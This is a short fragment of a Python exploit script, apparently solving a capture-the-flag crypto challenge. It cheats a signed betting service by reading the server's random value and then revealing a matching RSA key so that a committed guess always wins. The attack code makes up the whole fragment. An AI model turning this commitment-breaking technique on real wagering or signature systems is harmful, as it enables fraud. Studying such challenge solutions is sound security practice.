            # This assert runs after res has already been used above.
            assert res
            conn.send('{}\n'.format(monies))
            conn.recv_until(PatternMatcher.frombytes(b'At what odds'))
            conn.send('{}\n'.format(odd_max))
            conn.recv_until(PatternMatcher.frombytes(b'Alright, what is your'))
            send_with_sig(dsa, conn, binascii.b2a_hex(sig))
            res = conn.recv_until(PatternMatcher.frombytes(b'Now what is your'))
            rng = re.search(b'the secure RNG is ([0-9]+)\n', res).group(1).decode()
            rng = int(rng)
            print('rng is >> ', rng)
            want = rng % odd_max
            uu = get_rsa_key_from_db(n, db[want])
            print(uu)
            privkey = PKCS1_OAEP.new(RSA.importKey(uu))
            # `guess` is computed but only `uu` is sent back.
            guess = privkey.decrypt(sig)
            guess = int(guess[len("I hereby commit to a guess of "):])
            send_with_sig(dsa, conn, uu)